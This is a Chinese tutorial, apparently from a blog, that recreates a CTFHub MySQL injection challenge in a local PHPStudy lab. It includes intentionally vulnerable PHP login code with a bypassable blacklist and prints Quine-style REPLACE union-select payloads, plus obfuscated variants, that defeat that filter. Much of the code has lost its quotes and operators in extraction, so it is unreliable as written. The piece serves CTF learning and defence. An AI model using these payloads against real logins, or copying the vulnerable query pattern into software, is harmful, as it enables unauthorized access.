当前位置：首页 > article >正文

保姆级教程：在PHPStudy环境下复现CTFHub MySQL注入题（附WAF绕过Payload分析）

article 2026/4/4 6:57:47

从零构建MySQL注入实验环境PHPStudy靶场搭建与Quine攻击实战第一次接触SQL注入时我盯着屏幕上那个看似简单的登录框完全无法理解黑客是如何通过几个特殊字符就能突破系统防线的。直到亲手搭建环境、逐行调试代码后才真正明白那些教科书上的攻击手法究竟如何落地。本文将带你用最轻量的方式复现一个经典CTF题目不用云服务器、不依赖复杂工具只需一台普通Windows电脑和PHPStudy套件。1. 实验环境快速部署1.1 PHPStudy极简安装访问PHPStudy官网下载V8.1版本约50MB安装过程只需三步解压后运行phpstudy_x.x.x.exe选择安装路径建议D盘根目录勾选创建桌面快捷方式安装完成后启动控制面板点击启动按钮激活Apache和MySQL服务。常见问题排查端口冲突若80端口被占用修改Apache配置文件的Listen 80为其他端口服务启动失败尝试以管理员身份运行# 验证MySQL服务状态在PHPStudy安装目录下 ./MySQL/bin/mysqladmin -u root -p status1.2 靶场源码部署在PHPStudy的WWW目录新建ctfhub_sqli文件夹创建以下三个文件index.php前端登录页!DOCTYPE html html head titleMySQL注入实验/title /head body form actionlogin.php methodPOST input typetext nameusername placeholderUsername input typepassword namepassword placeholderPassword button typesubmitLogin/button /form a href?source1查看源码/a /body /htmllogin.php后端验证逻辑?php $FLAG CTFHub{THIS_IS_YOUR_FLAG}; function checkSql($input) { $blacklist [regexp,between,in,flag,,,,and,|, right,left,reverse,update,extractvalue,floor, substr,,;,$,0x,sleep, ]; foreach($blacklist as $word) { if(stripos($input, $word) ! false) { die(检测到危险字符: .htmlspecialchars($word)); } } } // 数据库连接 $con mysqli_connect(localhost,root,root); mysqli_select_db($con, ctfhub); mysqli_query($con, CREATE TABLE IF NOT EXISTS users(username varchar(20), password varchar(50))); // 登录验证 if(isset($_POST[username]) isset($_POST[password])) { $username $_POST[username]; $password $_POST[password]; if($username ! admin) die(仅允许admin登录); checkSql($password); $sql SELECT password FROM users WHERE usernameadmin AND password$password; $result mysqli_query($con, $sql); $row mysqli_fetch_assoc($result); if($row $row[password] $password) { die(登录成功! Flag: .$FLAG); } else { die(密码错误); } } if(isset($_GET[source])) { highlight_file(__FILE__); } ?lib.php辅助函数?php function alertMes($msg, $url) { die(scriptalert($msg);location.href$url;/script); } ?关键配置注意MySQL密码默认为root若修改过需同步调整login.php中的连接参数2. 注入原理深度解析2.1 代码审计关键点通过审计login.php我们发现三个致命漏洞硬编码凭证强制要求用户名为adminif($username ! admin) die(仅允许admin登录);WAF缺陷checkSql函数存在绕过可能// 用stripos逐个检查黑名单词未处理编码混淆 foreach($blacklist as $word) { if(stripos($input, $word) ! false) { die(检测到危险字符: .htmlspecialchars($word)); } }逻辑漏洞密码比对方式可被利用if($row $row[password] $password) { die(登录成功! Flag: .$FLAG); }2.2 攻击面分析常规注入手法在此场景全部失效攻击类型失效原因布尔盲注需要用到、、等被禁字符时间盲注sleep函数被过滤报错注入extractvalue等函数被禁止联合查询需要空格和union后的select突破口利用MySQL的REPLACE函数构造Quine自产生程序使查询结果与输入完全相同。3. Quine攻击实战演练3.1 REPLACE函数特性先通过基础示例理解函数行为-- 将字符串中的a替换为b SELECT REPLACE(abcdea, a, b); -- 输出: bbcdeb -- 多层嵌套替换 SELECT REPLACE(REPLACE(a.b.c, ., -), a, A); -- 执行顺序 -- 1. 内层REPLACEa-b-c -- 2. 外层REPLACEA-b-c3.2 自指构造技巧要实现$row[password] $password需构造特殊Payload使得数据库查询结果用户输入内容分步构建方案基础Quine模板REPLACE(REPLACE(REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46),.), CHAR(34), CHAR(39)), CHAR(46), REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46),.))绕过WAF的最终Payload1/**/union/**/select/**/replace(replace(1/**/union/**/select/**/replace(replace(.,char(34),char(39)),char(46),.)#,char(34),char(39)),char(46),1/**/union/**/select/**/replace(replace(.,char(34),char(39)),char(46),.)#)#URL编码后的攻击字符串usernameadminpassword1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(.,char(34),char(39)),char(46),.)%23,char(34),char(39)),char(46),1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(.,char(34),char(39)),char(46),.)%23)%233.3 分步调试过程在PHPStudy的MySQL命令行中逐步测试-- 步骤1验证基础替换逻辑 SELECT REPLACE(., CHAR(34), CHAR(39)); -- 输出: . -- 步骤2构建自指结构 SELECT REPLACE( REPLACE(REPLACE(.,CHAR(34),CHAR(39)), CHAR(34), CHAR(39)), CHAR(46), REPLACE(.,CHAR(34),CHAR(39)) ); -- 步骤3添加联合查询框架 SELECT password FROM users WHERE usernameadmin AND password1 UNION SELECT REPLACE(REPLACE(...,...),...,...);4. 防御方案与进阶思考4.1 安全加固建议漏洞点修复方案代码示例密码比对逻辑先查询再独立验证if(password_verify($input, $row[hash]))WAF实现使用正则完整匹配preg_match(/\b(union错误提示统一模糊消息die(认证失败)4.2 Quine攻击的变体探索十六进制编码版SELECT REPLACE(REPLACE(0x272e27,CHAR(34),CHAR(39)),CHAR(46),0x272e27)注释混淆版SELECT/*!50000REPLACE*/(REPLACE(./*注释*/,CHAR(34),CHAR(39)),CHAR(46),.)多函数组合版SELECT CONCAT(REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46), REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(34),CHAR(39))), --)在真实渗透测试中曾遇到过一个CMS系统因为类似漏洞导致后台沦陷。攻击者通过精心构造的评论内容利用数据库的字符串处理特性最终获取了管理员会话。这让我深刻意识到即使是最基础的字符串操作函数在特定上下文组合中也可能成为系统突破口。

保姆级教程：在PHPStudy环境下复现CTFHub MySQL注入题（附WAF绕过Payload分析）

相关文章：

保姆级教程：在PHPStudy环境下复现CTFHub MySQL注入题（附WAF绕过Payload分析）

别只盯着树莓派！聊聊GEC6818这块国产ARM板在嵌入式学习中的独特优势与避坑指南

别再复制粘贴了！深入理解STM32中IIR滤波器的差分方程与状态变量

Kook Zimage真实幻想Turbo企业级应用：SpringBoot微服务架构实战

Leather Dress Collection 快速上手：10分钟完成Vue3前端项目集成

FlowState Lab 在音频信号处理中的迁移应用效果：音高与节奏分析

比迪丽AI绘画效果展示：系列风格化角色设计作品集

FLAC转ALAC踩坑实录：除了音质无损，你的专辑封面和元数据都保留了吗？

别再死记硬背了！用MONAI Transform处理医学图像，这5个实战场景帮你一次搞懂

Linux文件传输利器SCP命令使用详解与实战技巧

MiniCPM-o-4.5-nvidia-FlagOS企业级方案：高可用服务器集群部署指南

Linux中的more 和 less区别对比分析

SDMatte与CI/CD集成：实现模型服务的自动化部署与更新

LongCat动物百变秀效果展示：橘猫变布偶、柯基穿毛衣，AI编辑惊艳案例

调试直流电机位置环PID时，我踩过的那些坑和解决思路

GeoServer零配置入门：如何用绿色版快速搭建本地地图服务器（含端口自定义技巧）

OpenClaw安全审计方案：Phi-3-mini-128k-instruct操作日志分析

SQL Server导入导出向导报错终极指南：从驱动安装到版本兼容性全解析

微信小程序对接实战：快速开发集成通义千问1.5-1.8B模型的AI聊天应用

用面包板和三极管DIY四比特加法器：从逻辑门到级联的完整实战记录

OpenClaw学术场景应用：Qwen3-32B镜像辅助论文数据处理

nuScenes 3D标注数据深度解析：从Box字段到可视化，理解自动驾驶感知的基石

SN75453与非门电路设计：如何正确选择上下拉电阻值（附计算公式）

DeOldify跨框架模型转换：从PyTorch到ONNX及TensorRT加速

零售AI开发者必看：Ostrakon-VL-8B终端从部署到任务执行完整指南

别再写“超级循环“了！裸机系统跑得快的秘密，全在架构上

YOLOE镜像从入门到精通：环境激活、代码预测、训练微调全流程

EasyAnimateV5-7b-zh-InP模型在微信小程序中的应用：短视频生成功能实现

使用CSDN博客记录FRCRN部署全过程：技术分享与经验沉淀

TurboDiffusion实战案例：如何让静态产品图“动”起来做广告